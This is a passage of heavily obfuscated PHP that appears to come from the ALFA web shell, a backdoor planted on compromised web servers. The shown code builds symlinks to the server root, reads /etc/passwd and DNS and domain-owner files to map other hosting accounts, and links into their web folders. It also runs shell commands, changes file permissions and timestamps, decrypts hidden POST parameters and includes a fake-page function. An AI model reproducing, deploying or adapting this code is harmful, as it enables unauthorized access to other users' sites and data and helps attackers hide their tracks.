\164\x75\162\x6e\x20\x66\x61\x6c\x73\x65\x3b\x22\x20\155\145\164\x68\157\144\75\42\160\157\163\164\x22\76\12\74\151\156\160\x75\x74\x20\x74\171\x70\x65\x3d\x22\164\145\170\x74\42\40\x6e\141\x6d\x65\x3d\42\x66\151\x6c\145\42\x20\x70\x6c\x61\143\x65\150\157\x6c\x64\145\x72\x3d\42\x45\170\x61\x6d\160\154\145\x20\72\40\57\150\x6f\x6d\145\57\165\x73\145\x72\57\160\165\x62\x6c\x69\143\x5f\150\x74\155\x6c\57\143\x6f\156\x66\151\x67\x2e\x70\150\160\42\x20\163\x69\172\145\x3d\x22\66\60\42\x2f\76\74\142\162\x20\x2f\x3e\12\x3c\151\x6e\160\x75\164\x20\164\x79\160\145\75\42\x74\x65\x78\x74\x22\40\x6e\141\x6d\145\x3d\x22\x73\x79\155\146\x69\x6c\145\x22\40\x70\x6c\141\143\145\150\x6f\x6c\x64\145\x72\x3d\42\x45\x78\x61\x6d\x70\x6c\145\40\x3a\40\141\x6c\146\141\56\x74\170\x74\42\x20\x73\x69\172\x65\75\x22\66\60\x22\57\x3e\xa\x3c\x70\x3e\x3c\151\156\160\165\164\x20\164\x79\160\145\x3d\x22\163\x75\142\x6d\151\164\42\x20\166\x61\x6c\165\145\75\x22\x20\x22\x20\x6e\141\155\x65\75\x22\163\x79\155\154\151\x6e\x6b\42\40\x2f\x3e\74\x2f\160\76\x3c\57\146\x6f\x72\155\76\74\x2f\x63\x65\x6e\164\x65\x72\x3e"; $path = $_POST["\141\x6c\x66\141\65"]; $symname = $_POST["\x61\x6c\146\x61\66"]; $solevisible58 = $_POST["\141\154\x66\x61\x37"]; if ($solevisible58) { $new_name = str_replace("\x2e", "\137", basename($symname)); $rand_dir = $new_name . rand(111, 9999); $sym_dir = "\141\154\146\141\x73\x79\x6d\x6c\x69\156\153\160\150\160\x2f" . $rand_dir . "\57"; @mkdir($sym_dir, 511, true); alfacgihtaccess("\163\x79\155", $sym_dir, $symname); _alfa_symlink("{$path}", "{$sym_dir}\x2f{$symname}"); echo __pre(); echo "\74\x63\145\156\164\x65\162\x3e\x3c\142\x3e\x3c\146\x6f\x6e\x74\x20\x63\x6f\154\157\x72\x3d\42\x77\x68\151\x74\145\42\x3e\x43\154\151\143\153\40\x3e\x3e\40\74\x2f\146\x6f\156\164\x3e\x3c\x61\x20\164\141\162\x67\x65\x74\75\x22\137\x62\x6c\141\156\x6b\42\x20\x68\162\145\146\x3d\42" . __ALFA_DATA_FOLDER__ . "\x2f" . $sym_dir . "\42\x20\76\74\142\x3e\x3c\x66\x6f\156\x74\x20\163\x69\x7a\x65\75\42\64\42\76" . $symname . "\74\x2f\x66\157\x6e\x74\x3e\74\x2f\142\76\74\57\141\x3e\x3c\x2f\142\76\x3c\57\143\145\x6e\x74\x65\162\x3e"; } } else { echo "\74\x63\145\156\x74\145\x72\76\74\x70\162\145\x20\x63\154\141\163\x73\75\155\x6c\x31\40\163\164\x79\x6c\145\75\x27\x6d\141\162\x67\151\x6e\55\164\157\160\72\x35\x70\x78\x27\x3e\74\142\x3e\x3c\146\157\x6e\x74\x20\143\157\154\x6f\x72\75\42\43\x46\x46\106\x46\x46\x46\42\76\x5b\x2b\135\40\123\x79\155\x6c\x69\x6e\x6b\x20\106\165\156\143\164\151\157\x6e\40\x44\151\x73\141\x62\154\x65\144\x20\x21\x3c\57\142\76\74\57\x66\157\x6e\x74\x3e\x3c\x2f\x70\162\145\x3e\x3c\x2f\143\x65\x6e\x74\x65\162\x3e"; } } if (isset($_POST["\141\x6c\x66\x61\x32"]) && $_POST["\x61\154\146\x61\x32"] == "\163\171\x6d\x70\x68\160") { $cant_symlink = true; if (function_exists("\x73\x79\x6d\x6c\x69\x6e\153") || _alfa_can_runCommand(false, false)) { @mkdir("\141\x6c\146\x61\x73\x79\x6d\x6c\151\x6e\153", 511); alfacgihtaccess("\163\171\x6d", "\141\154\146\x61\x73\x79\155\154\151\x6e\153\57"); _alfa_symlink("\x2f", "\x61\x6c\146\141\x73\x79\x6d\154\151\x6e\x6b\x2f\x72\x6f\157\164"); $table_header = "\x3c\x70\x72\145\x20\151\144\75\x22\163\x74\x72\117\x75\x74\160\x75\164\x22\x20\163\164\171\x6c\145\75\x22\155\x61\x72\x67\151\x6e\x2d\164\x6f\x70\72\65\x70\170\42\40\x63\154\x61\163\163\75\42\x6d\x6c\61\x22\76\74\x62\x72\x3e\74\164\x61\x62\154\x65\40\x69\144\x3d\x27\x74\x62\x6c\x5f\x73\171\155\160\x70\x68\x70\x27\40\x61\x6c\x69\x67\x6e\x3d\47\x63\x65\x6e\164\145\x72\47\40\x77\x69\144\x74\150\75\47\x34\x30\x25\47\40\x63\x6c\141\x73\163\x3d\47\x6d\x61\151\x6e\47\40\142\x6f\162\x64\145\x72\x3d\x27\61\47\76\74\x74\144\76\x3c\x73\x70\x61\156\40\x73\164\x79\x6c\145\x3d\47\x63\x6f\154\x6f\x72\72\x23\x46\x46\x46\106\60\x31\x3b\x27\76\74\x62\x3e\52\74\57\x73\160\141\156\x3e\x3c\57\x62\76\74\57\164\x64\x3e\74\x74\144\x3e\74\163\x70\x61\156\40\x73\164\171\154\x65\75\47\143\157\154\x6f\162\72\43\60\60\x41\x32\x32\x30\x3b\x27\x3e\74\x62\x3e\x44\x6f\155\x61\x69\156\163\74\57\163\160\x61\156\x3e\74\57\142\76\x3c\x2f\164\144\x3e\74\x74\144\76\x3c\163\x70\141\156\40\x73\x74\x79\154\x65\x3d\x27\x63\x6f\154\x6f\162\x3a\43\x46\106\106\106\x46\106\x3b\x27\x3e\x3c\x62\76\125\x73\145\162\163\x3c\57\163\x70\141\x6e\76\74\57\x62\76\x3c\x2f\164\x64\x3e\74\164\x64\76\74\x73\x70\x61\x6e\x20\163\x74\x79\154\145\x3d\47\x63\157\154\157\162\72\x23\x46\106\x30\60\x30\60\73\47\x3e\x3c\x62\x3e\x73\171\x6d\x6c\151\156\153\74\57\163\x70\141\x6e\76\x3c\x2f\142\x3e\74\57\164\x64\76"; if (_alfa_file_exists("\x2f\x65\x74\143\x2f\x6e\x61\x6d\x65\144\x2e\x63\157\x6e\146") && !_alfa_file_exists("\57\x65\x74\x63\57\166\x69\x72\164\165\141\x6c\57\144\x6f\155\x61\x69\x6e\157\x77\156\145\162\163") && _alfa_file_exists("\57\145\164\143\57\x76\x61\x6c\x69\141\x73\145\163\57")) { echo "\74\143\x65\x6e\164\x65\x72\x3e"; $lines = array(); $anony_domains = array(); $anonymous_users = array(); $f_black = array(); $error = false; $anonymous = false; $makepwd = "\57\150\x6f\155\x65\57\173\x75\x73\145\x72\x7d\57\160\165\142\x6c\x69\143\x5f\x68\x74\x6d\x6c\57"; $domains = alfaGetDomains(); $lines = $domains["\154\x69\156\145\163"]; $state = $domains["\163\164\141\x74\145"]; $is_posix = function_exists("\160\x6f\x73\x69\x78\137\147\x65\164\x70\x77\165\151\x64") && function_exists("\146\151\x6c\x65\x6f\167\156\x65\x72"); $can_runcmd = _alfa_can_runCommand(false, false); if (!$is_posix && !$can_runcmd) { $anonymous = true; $anony_domains = $domains["\x6c\151\x6e\x65\x73"]; $lines = _alfa_file("\57\x65\164\x63\x2f\x70\x61\163\163\x77\x64"); } echo $table_header; $count = 1; $template = "\74\x74\162\x3e\74\164\144\x3e\74\x73\x70\x61\x6e\40\x73\x74\171\x6c\145\x3d\x22\x63\x6f\154\157\162\72\43\x46\x46\x46\106\60\61\73\x22\x3e\173\143\157\165\156\164\175\74\57\163\160\141\x6e\x3e\74\57\164\x64\76\x3c\164\144\40\x73\164\x79\x6c\x65\75\x22\x74\145\x78\164\x2d\x61\x6c\x69\147\156\x3a\154\145\x66\x74\73\42\x3e\74\x61\40\x74\x61\162\x67\x65\164\75\x22\x5f\x62\154\141\x6e\153\42\x20\x68\x72\145\146\75\42\x7b\x68\164\x74\160\175\x22\x2f\76\x3c\163\x70\141\x6e\40\163\x74\171\x6c\145\75\x22\143\x6f\154\x6f\162\72\43\60\60\x41\x32\x32\60\x3b\155\x61\162\x67\151\x6e\55\x6c\145\x66\x74\72\x31\x30\x70\170\x3b\x22\76\74\142\x3e\x7b\144\157\x6d\141\151\156\175\x3c\x2f\x62\76\x20\x3c\x2f\141\76\x3c\57\163\160\141\156\76\x3c\x2f\x74\144\76\x3c\164\144\x20\163\x74\171\154\145\75\42\x74\145\x78\164\x2d\141\x6c\151\147\156\72\x6c\145\146\x74\x3b\42\76\74\x73\x70\141\x6e\x20\163\164\171\x6c\145\x3d\42\x63\x6f\x6c\157\162\72\43\x46\106\x46\x46\106\x46\x3b\x6d\x61\x72\x67\151\156\55\154\x65\x66\x74\x3a\x31\x30\x70\170\x3b\42\76\x3c\x62\76\173\157\167\x6e\145\x72\x7d\x3c\x2f\146\x6f\156\164\x3e\74\57\x62\76\74\57\164\x64\x3e\x3c\x74\144\76\x3c\141\40\x68\x72\145\146\75\42" . __ALFA_DATA_FOLDER__ . "\57\x61\x6c\x66\x61\163\171\x6d\x6c\151\x6e\153\57\162\x6f\x6f\164\173\x73\171\x6d\160\x61\x74\x68\x7d\42\x20\x74\141\162\147\x65\164\75\42\137\x62\154\x61\x6e\153\x22\76\74\x73\160\x61\156\x20\x73\164\x79\x6c\145\75\x22\x63\157\154\x6f\162\72\x23\106\106\x30\x30\x30\x30\x3b\42\x3e\x53\x79\155\x6c\x69\x6e\153\74\x2f\x73\x70\141\x6e\x3e\x3c\x2f\141\76\x3c\57\x74\144\x3e\74\x2f\164\x72\76"; foreach ($lines as $line) { $domain = ''; $owner = ''; if ($anonymous) { $explode = explode("\x3a", $line); $owner = $explode[0]; $owner_len = strlen($owner) - 1; $userid = $explode[2]; if ((int) $userid < 500) { continue; } $domain = "\133\77\x3f\77\77\x3f\x5d"; $temp_black = array(); $finded = false; foreach ($anony_domains as $anony) { if ($state == "\156\x61\x6d\x65\x64\56\x63\157\156\x66") { if (@strstr($anony, "\172\157\156\x65")) { preg_match_all("\43\x7a\157\x6e\x65\40\x22\50\56\52\x29\x22\x23", $anony, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "\156\141\155\x65\144" || $state == "\x76\141\x6c\x69\x61\163\x65\x73") { if ($anony == "\x2e" || $anony == "\56\x2e") { continue; } if ($state == "\x6e\141\155\145\144") { $anony = rtrim($anony, "\x2e\144\x62"); } $domain = $anony; } $sub_domain = str_replace(array("\x2d", "\x2e"), '', $domain); if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) { if (in_array($owner . $domain, $temp_black)) { continue; } $sympath = str_replace("\173\x75\x73\x65\x72\175", $owner, $makepwd); $http = "\x68\x74\164\160\x3a\57\57" . $domain; echo str_replace(array("\173\143\157\x75\156\164\x7d", "\x7b\x68\x74\164\160\x7d", "\173\144\157\155\x61\x69\156\x7d", "\173\157\x77\156\x65\162\175", "\173\163\171\x6d\160\x61\x74\x68\175"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $temp_black[] = $owner . $domain; $finded = true; } } if (!$finded) { $anonymous_users[] = $owner; } } else { if ($state == "\x6e\x61\x6d\x65\x64\56\x63\x6f\x6e\146") { if (@strstr($line, "\172\157\156\145")) { preg_match_all("\43\x7a\x6f\x6e\145\40\42\x28\x2e\x2a\51\42\x23", $line, $data); $domain = $data[1][0]; } else { continue; } } elseif ($state == "\156\x61\x6d\145\x64" || $state == "\x76\141\x6c\151\141\163\145\x73") { if ($line == "\x2e" || $line == "\56\x2e") { continue; } if ($state == "\x6e\141\x6d\145\x64") { $line = rtrim($line, "\56\144\142"); } $domain = $line; } if (strlen(trim($domain)) > 2 && $state != "\160\x61\163\x73\167\x64") { if (!_alfa_file_exists("\x2f\x65\164\143\57\166\x61\x6c\x69\141\163\145\x73\x2f" . $domain, false)) { continue; } if ($is_posix) { $user = @posix_getpwuid(@fileowner("\57\145\x74\x63\57\166\141\x6c\x69\x61\x73\145\163\57" . $domain)); $owner = $user["\x6e\141\x6d\145"]; } elseif ($can_runcmd) { $owner = alfaEx("\x73\164\x61\x74\x20\x2d\143\x20\47\45\x55\47\x20\x2f\x65\x74\143\57\x76\141\x6c\x69\141\x73\145\x73\x2f" . $domain, false, false); } } } if (!$anonymous) { if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) { continue; } $sympath = str_replace("\x7b\165\x73\145\162\175", $owner, $makepwd); $http = "\x68\164\x74\x70\72\x2f\x2f" . $domain; if ($state == "\x70\x61\x73\x73\167\x64") { $http = "\152\141\x76\x61\163\143\162\151\x70\164\x3a\141\154\x65\162\x74\x28\x27\x77\145\x20\143\141\156\x74\x20\146\x69\x6e\x64\40\x64\157\155\x61\151\156\x2e\x2e\x2e\47\51"; } echo str_replace(array("\x7b\x63\157\165\x6e\x74\175", "\173\150\x74\164\x70\x7d", "\173\x64\157\x6d\141\151\x6e\175", "\x7b\157\x77\156\x65\162\175", "\x7b\163\x79\155\160\141\164\150\x7d"), array($count, $http, $domain, $owner, $sympath), $template); $count++; $f_black[] = $owner . $domain; } } if ($anonymous) { foreach ($anonymous_users as $owner) { $sympath = str_replace("\173\x75\x73\x65\x72\175", $owner, $makepwd); $http = "\x6a\141\x76\x61\163\x63\x72\151\160\164\72\141\154\x65\x72\164\50\47\x77\x65\40\x63\x61\x6e\164\40\146\151\156\144\x20\x64\x6f\x6d\x61\x69\x6e\x2e\x2e\x2e\47\x29"; echo str_replace(array("\x7b\x63\x6f\165\x6e\164\x7d", "\173\x68\x74\x74\x70\x7d", "\x7b\144\x6f\155\141\151\156\175", "\x7b\157\x77\156\x65\162\x7d", "\x7b\x73\x79\x6d\x70\141\164\x68\x7d"), array($count, $http, "\133\x3f\x3f\x3f\77\135", $owner, $sympath), $template); $count++; } } $cant_symlink = false; } else { $is_direct = false; $makepwd = alfaMakePwd(); if (_alfa_file_exists("\57\145\x74\143\x2f\166\151\x72\x74\165\x61\154\x2f\x64\x6f\x6d\141\151\x6e\x6f\167\156\145\162\x73")) { $makepwd = "\x2f\150\x6f\155\x65\57\x7b\165\x73\x65\x72\175\57\x70\x75\x62\x6c\151\x63\x5f\150\x74\x6d\154"; $is_direct = true; } $sole = _alfa_file("\57\x65\164\143\x2f\x76\151\162\164\165\141\154\57\x64\x6f\155\x61\151\156\x6f\x77\156\145\162\163"); $count = 1; echo $table_header; $template = "\74\164\162\76\x3c\164\x64\x3e\x3c\x73\160\x61\x6e\x20\x73\x74\171\x6c\145\75\x22\x63\x6f\154\x6f\x72\x3a\43\x46\106\106\106\x30\61\73\42\76\x7b\143\x6f\x75\x6e\164\175\74\x2f\163\x70\x61\156\76\x3c\57\x74\144\76\x3c\164\x64\40\x73\164\x79\x6c\x65\x3d\x22\164\x65\170\164\55\x61\x6c\151\x67\x6e\72\x6c\x65\146\164\x3b\42\x3e\74\x61\40\164\141\162\147\145\x74\x3d\42\137\142\x6c\141\156\153\42\x20\x68\162\145\x66\x3d\42\x68\164\164\x70\x3a\x2f\57\x77\x77\167\56\173\165\x72\154\175\42\x2f\x3e\x3c\163\160\x61\x6e\40\163\164\x79\x6c\x65\x3d\42\143\157\154\x6f\x72\x3a\x23\x30\x30\101\62\62\60\x3b\155\x61\162\x67\x69\x6e\55\x6c\145\x66\164\x3a\61\60\x70\x78\73\x22\x3e\x3c\x62\76\x7b\x75\162\154\x7d\74\x2f\x62\x3e\x20\74\57\x61\76\74\57\x73\x70\141\x6e\76\74\57\x74\x64\x3e\74\x74\x64\x20\163\164\171\154\145\75\42\x74\x65\x78\164\x2d\x61\x6c\x69\x67\x6e\72\154\145\146\x74\73\42\x3e\x3c\163\160\x61\x6e\x20\163\x74\171\154\x65\x3d\42\x63\x6f\x6c\x6f\162\x3a\43\106\106\x46\106\106\x46\x3b\x6d\141\162\x67\151\156\55\x6c\145\x66\x74\x3a\61\60\160\x78\x3b\x22\x3e\74\x62\76\x7b\165\x73\x65\162\x7d\74\57\146\157\x6e\x74\x3e\74\57\142\76\74\57\164\144\x3e\x3c\164\144\76\x3c\141\x20\150\162\x65\x66\x3d\42" . __ALFA_DATA_FOLDER__ . "\57\141\154\146\141\x73\171\x6d\x6c\x69\156\153\57\x72\157\157\x74\x7b\x63\x77\144\175\x22\x20\x74\141\x72\x67\145\x74\x3d\42\x5f\x62\154\x61\156\x6b\42\76\74\x73\x70\141\x6e\x20\x73\x74\x79\154\x65\75\x22\143\157\154\x6f\x72\x3a\43\106\x46\60\60\60\x30\x3b\x22\x3e\x53\171\x6d\x6c\x69\156\x6b\74\57\x73\160\141\156\76\74\57\x61\x3e\x3c\57\x74\144\76\x3c\57\x74\x72\76"; if ($sole) { foreach ($sole as $visible) { if (@strstr($visible, "\x3a")) { $solevisible = explode("\x3a", $visible); $cwd = str_replace("\x7b\165\163\145\162\175", trim($solevisible[1]), $makepwd); echo str_replace(array("\173\x63\x6f\165\x6e\x74\x7d", "\x7b\165\163\x65\x72\x7d", "\x7b\165\x72\x6c\175", "\x7b\x63\167\144\x7d"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template); } } } else { $passwd = _alfa_file("\57\145\x74\143\57\x70\x61\x73\x73\x77\x64"); if ($passwd) { $html = ''; $is_named = false; $users = array(); $domains = array(); $uknowns = array(); foreach ($passwd as $user) { $user = trim($user); $expl = explode("\72", $user); if ((int) $expl[2] < 500) { continue; } $users[$expl[0]] = $expl[5]; } $site_domains = @scandir("\x2f\145\164\x63\x2f\166\x69\x72\x74\x75\141\x6c\x2f"); if (!$site_domains) { $site_domains = alfaEx("\154\x73\40\x2f\145\164\x63\x2f\x76\x69\162\164\165\x61\x6c\57"); $site_domains = explode("\xa", $site_domains); if (!$site_domains) { $site_domains = _alfa_file("\x2f\145\x74\x63\x2f\156\x61\x6d\x65\x64\x2e\143\x6f\156\x66"); if ($site_domains) { $is_named = true; } } } foreach ($site_domains as $line) { if ($is_named) { if (@strstr($line, "\172\x6f\x6e\145")) { preg_match_all("\43\x7a\x6f\156\x65\x20\42\50\x2e\x2a\x29\x22\43", $line, $data); $domain = $data[1][0]; if (strlen($domain > 2) && !empty($domain)) { $domains[] = $domain; } } } else { $domains[] = $line; } } $x = 1; foreach ($users as $user => $home) { foreach ($domains as $domain) { $user_len = strlen($user) - 1; $sub_domain = str_replace(array("\x2d", "\56"), '', $domain); $five_user = substr($user, 0, $user_len); $five_domain = substr($sub_domain, 0, $user_len); if ($five_user == $five_domain) { if ($is_direct) { $cwd = str_replace("\173\165\163\145\162\x7d", $user, $makepwd); } else { $expl = explode("\175\x2f", $makepwd); $cwd = $home . "\57" . $expl[1]; } $html .= str_replace(array("\173\143\x6f\x75\156\164\x7d", "\x7b\165\x73\145\x72\x7d", "\173\x75\162\154\175", "\x7b\x63\167\144\175"), array($x++, $user, $domain, $cwd), $template); } else { $uknowns[$user] = $home; } } } $uknowns = array_unique($uknowns); foreach ($uknowns as $user => $home) { if ($is_direct) { $cwd = str_replace("\173\165\x73\x65\x72\x7d", $user, $makepwd); } else { $expl = explode("\x7d\x2f", $makepwd); $cwd = $home . "\x2f" . $expl[1]; } $html .= str_replace(array("\x7b\143\x6f\x75\x6e\164\x7d", "\173\165\x73\x65\x72\x7d", "\173\x75\162\154\175", "\173\143\167\x64\175"), array($x++, $user, "\133\x3f\x3f\x3f\x3f\x3f\135", $cwd), $template); } echo $html; } } echo "\74\x2f\164\x61\x62\154\145\x3e"; $cant_symlink = false; } } else { echo "\74\x70\x72\x65\40\143\154\x61\163\x73\75\155\154\x31\40\x73\x74\x79\x6c\x65\x3d\47\155\x61\x72\x67\151\156\x2d\164\x6f\x70\x3a\x35\160\x78\47\76\x3c\x62\x3e\74\x66\x6f\x6e\164\40\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x46\x46\x46\106\x46\x46\x22\76\133\x2b\x5d\40\x53\171\x6d\x6c\x69\156\153\x20\106\x75\156\x63\x74\151\x6f\156\40\x44\151\163\x61\x62\x6c\145\144\x20\x21\x3c\x2f\x62\76\74\57\x66\157\156\x74\x3e\74\x2f\x70\162\x65\x3e\x3c\x2f\x63\145\156\164\145\x72\76"; $cant_symlink = false; } if ($cant_symlink) { echo "\74\160\162\x65\x20\x69\x64\x3d\x22\163\x74\x72\117\x75\164\160\x75\164\42\x20\163\164\x79\x6c\x65\x3d\x22\x6d\x61\162\x67\x69\x6e\x2d\x74\x6f\x70\x3a\x35\x70\170\x22\40\x63\x6c\x61\163\163\x3d\42\155\x6c\61\42\76\x3c\142\162\x3e\x3c\x66\157\156\164\x20\x63\157\x6c\157\162\75\42\43\x46\106\106\x46\106\x46\x22\x3e\105\162\x72\157\x72\56\x2e\x2e\74\57\146\157\156\164\x3e\x3c\57\142\76\x3c\x62\162\x3e"; } echo "\74\57\x63\145\156\x74\x65\162\76\74\x2f\164\x61\x62\154\145\76"; } echo "\74\57\x64\151\166\x3e"; alfafooter(); } goto GzfHC; ZNK2s: function alfadoActions() { $chdir_fals = false; if (!@chdir($_POST["\x63"])) { $chdir_fals = true; $alfa_canruncmd = _alfa_can_runCommand(true, true); } if (isset($_POST["\x61\154\146\x61\61"])) { $_POST["\141\x6c\146\141\61"] = rawurldecode($_POST["\x61\154\x66\141\61"]); } if (isset($_POST["\x61\154\x66\141\62"])) { $_POST["\x61\154\146\x61\x32"] = rawurldecode($_POST["\x61\154\146\141\x32"]); } $action = $_POST["\x61\154\x66\x61\x33"]; if ($action == "\x70\145\x72\155\151\163\x73\151\x6f\x6e") { $perms = 0; $perm = $_POST["\x61\154\x66\141\x32"]; for ($i = strlen($perm) - 1; $i >= 0; --$i) { $perms += (int) $perm[$i] * pow(8, strlen($perm) - $i - 1); } if (@chmod($_POST["\x61\x6c\x66\141\61"], $perms)) { echo "\144\x6f\x6e\x65"; } else { echo "\156\x6f"; } return; } if ($action == "\x72\145\156\141\x6d\145" || $action == "\155\x6f\166\x65") { $alfa1_decoded = $_POST["\141\154\146\x61\x31"]; if ($chdir_fals) { $_POST["\141\154\146\x61\61"] = $_POST["\x63"] . "\x2f" . $_POST["\141\x6c\x66\x61\x31"]; } $_POST["\141\154\x66\x61\61"] = trim($_POST["\x61\x6c\146\x61\61"]); $alfa1_escape = addslashes($_POST["\x61\154\146\x61\x31"]); if ($_POST["\x61\x6c\x66\141\63"] == "\162\x65\156\x61\155\x65") { $_POST["\x61\154\146\141\x32"] = basename($_POST["\141\154\x66\x61\x32"]); } if (!empty($_POST["\141\x6c\146\141\62"])) { $cmd_rename = false; if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["\x61\x6c\146\141\61"])) { $cmd_rename = true; $alfa1_escape = addslashes($alfa1_decoded); alfaEx("\143\x64\40\x27" . addslashes($_POST["\x63"]) . "\x27\x3b\155\x76\40\x27" . $alfa1_escape . "\x27\x20\x27" . addslashes($_POST["\141\x6c\x66\141\62"]) . "\x27"); } } if (!file_exists($_POST["\x61\154\146\x61\62"])) { if (@rename($_POST["\x61\x6c\146\141\x31"], $_POST["\x61\154\146\141\x32"]) || $cmd_rename) { echo "\144\x6f\x6e\x65"; } else { echo "\x6e\157"; } } else { echo "\x6e\157"; } } } elseif ($action == "\x63\157\x70\171") { if (is_dir($_POST["\141\x6c\146\141\x31"])) { $dir = str_replace("\57\57", "\57", $_POST["\141\154\146\141\x31"]); $dir = explode("\x2f", $dir); if (empty($dir[count($dir) - 1])) { $name = $dir[count($dir) - 2]; } else { $name = $dir[count($dir) - 1]; } } else { $name = basename($_POST["\141\154\x66\141\x31"]); } $dir = dirname($_POST["\141\x6c\x66\x61\x31"]); if ($dir == "\56") { $dir = $_POST["\x63"] . "\x2f"; } if (is_file($_POST["\x61\x6c\x66\x61\x31"])) { @copy($_POST["\x61\x6c\x66\x61\x31"], $_POST["\x61\x6c\x66\x61\x32"]); echo "\x64\157\x6e\145"; } elseif (is_dir($_POST["\x61\x6c\146\x61\x31"])) { if (!is_dir($_POST["\141\x6c\x66\x61\62"])) { mkdir($_POST["\141\154\x66\141\62"], 493, true); } copy_paste($dir, $name, $_POST["\141\x6c\x66\141\x32"] . "\x2f"); echo "\144\157\156\145"; } } elseif ($action == "\155\157\x64\151\146\x79") { if (!empty($_POST["\x61\154\x66\x61\x31"])) { $time = strtotime($_POST["\x61\154\x66\x61\x31"]); if ($time) { $touched = false; if ($chdir_fals && $alfa_canruncmd) { alfaEx("\143\144\x20\x27" . addslashes($_POST["\143"]) . "\x27\73\x74\x6f\165\143\x68\40\x2d\144\x20\x27" . htmlspecialchars(addslashes($_POST["\141\x6c\146\141\61"])) . "\47\40\x27" . addslashes($_POST["\141\154\146\x61\x32"]) . "\47"); $touched = true; } if (!@touch($_POST["\x61\x6c\x66\141\x32"], $time, $time) && !$touched) { echo "\x6e\x6f"; } else { echo "\x6f\153"; } } else { echo "\x62\141\x64\164\151\155\x65"; } } } } goto LsgNQ; ldnR5: function convertBash($code) { $dictionary = array("\x5b\60\x31\73\63\60\155" => "\74\x73\160\141\156\x20\163\164\171\154\145\x3d\42\x63\157\x6c\x6f\162\72\x62\154\141\x63\153\x22\x3e", "\133\60\61\73\63\61\155" => "\74\x73\x70\141\x6e\x20\x73\164\x79\154\x65\75\42\143\157\x6c\x6f\x72\x3a\x72\145\144\x22\76", "\133\x30\61\73\x33\x32\155" => "\x3c\x73\x70\x61\x6e\x20\163\164\171\x6c\145\75\42\x63\x6f\154\157\x72\72\x67\162\145\x65\156\42\76", "\x5b\60\61\x3b\63\x33\155" => "\74\x73\x70\x61\156\x20\163\x74\171\x6c\145\75\42\x63\x6f\x6c\x6f\162\72\x79\x65\154\154\157\167\x22\76", "\133\x30\61\x3b\63\x34\155" => "\x3c\x73\160\x61\x6e\40\x73\164\x79\x6c\x65\x3d\x22\x63\x6f\x6c\157\x72\x3a\x62\154\x75\145\x22\76", "\133\x30\61\73\x33\65\155" => "\74\163\x70\141\x6e\x20\x73\x74\x79\154\x65\75\42\143\x6f\x6c\157\x72\x3a\160\165\162\x70\x6c\x65\42\x3e", "\x5b\x30\x31\73\x33\x36\155" => "\x3c\163\160\141\156\x20\x73\164\171\154\145\75\42\143\x6f\x6c\157\x72\x3a\143\x79\x61\156\x22\76", "\x5b\x30\61\73\63\67\155" => "\x3c\x73\x70\141\156\40\163\164\x79\154\145\x3d\42\143\157\x6c\x6f\162\72\x77\150\x69\x74\x65\x22\x3e", "\x5b\60\x6d" => "\x3c\x2f\x73\160\141\156\x3e"); $htmlString = str_replace(array_keys($dictionary), $dictionary, $code); return $htmlString; } goto ZNK2s; vH5gS: $hex = "\x76\x69\x63\x72\171\141\x66\x31\64\100\x67\x6d\x61\x69\154\x2e\x63\x6f\155\54\x20\146\x6f\162\142\x69\x64\x64\145\x6e\x6d\162\64\x30\63\100\147\155\141\x69\154\x2e\x63\157\x6d"; goto ulFiJ; rrdVW: foreach ($_POST as $key => $value) { if (is_array($_POST[$key])) { $i = 0; foreach ($_POST[$key] as $f) { $f = trim(str_replace("\40", "\53", $f)); $_POST[$key][$i] = decrypt_post($f); $i++; } } else { $value = trim(str_replace("\40", "\53", $value)); $_POST[$key] = decrypt_post($value); } } goto DwLPi; QjYKO: define("\x5f\137\x41\x4c\106\x41\137\x50\117\123\124\137\x45\116\103\x52\x59\120\124\x49\117\116\137\x5f", isset($GLOBALS["\x44\x42\x5f\x4e\x41\115\105"]["\160\157\x73\164\137\x65\156\x63\x72\171\x70\164\151\157\x6e"]) && $GLOBALS["\x44\x42\x5f\x4e\x41\x4d\105"]["\160\157\163\x74\137\145\x6e\x63\x72\x79\x70\164\x69\x6f\x6e"] == true ? true : false); goto GF8GE; F8Vk4: @session_write_close(); goto TLuCO; SbgNO: $GLOBALS["\147\x6c\157\142\137\143\x68\x64\151\162\137\x66\141\x6c\x73\145"] = false; goto Qm0Jb; zHgw5: function alfafakepage() { alfahead(); AlfaNum(9, 10); echo "\74\144\x69\166\40\143\x6c\141\x73\x73\75\150\x65\141\144\145\x72\x3e\x3c\142\x72\x3e\12\x9\74\143\145\x6e\x74\x65\162\x3e\74\x64\x69\166\40\x63\x6c\141\163\x73\x3d\42\x74\x78\x74\146\x6f\156\164\137\150\x65\x61\144\145\162\42\76\174\40\110\157\163\x74\40\x4d\141\156\141\x67\145\x72\x20\106\141\x6b\x65\x20\160\x61\147\145\40\174\74\57\144\x69\166\x3e\74\x2f\143\145\x6e\164\x65\162\76\74\142\162\x3e\74\x62\x72\76\74\146\x6f\162\x6d\40\x6f\x6e\123\165\x62\155\x69\x74\x3d\42\147\50\47\x66\141\153\x65\x70\x61\x67\145\x27\x2c\156\165\x6c\x6c\x2c\x74\x68\x69\x73\56\143\x6c\157\x6e\145\137\160\141\147\x65\56\x76\x61\x6c\x75\x65\x2c\164\150\x69\163\56\146\x61\153\x65\137\x72\x6f\157\x74\x2e\x76\x61\154\x75\145\54\47\76\76\47\x2c\164\150\151\163\56\154\x6f\147\x74\157\56\x76\x61\x6c\x75\145\54\x74\150\x69\x73\x2e\160\141\x6e\x65\x6c\x2e\x76\141\154\x75\145\x2c\164\150\x69\x73\x2e\x69\x6e\152\145\x63\164\137\x74\157\x2e\166\141\x6c\165\x65\54\164\150\151\163\56\x62\x69\x6e\144\137\157\156\56\x76\x61\x6c\x75\x65\x2c\x74\x68\x69\x73\56\x63\157\x75\156\x74\56\x76\x61\x6c\165\x65\51\73\x72\x65\x74\x75\162\156\40\146\x61\x6c\x73\145\73\x22\40\x6d\145\x74\x68\x6f\144\x3d\x27\160\x6f\163\164\x27\76\12\11\x3c\144\x69\x76\x20\143\x6c\x61\x73\163\75\42\x74\x78\164\146\x6f\x6e\x74\42\40\x73\164\x79\x6c\x65\x3d\x22\160\x6f\163\x69\x74\x69\157\x6e\x3a\x20\162\x65\154\141\x74\x69\x76\145\73\154\x65\x66\x74\72\x20\65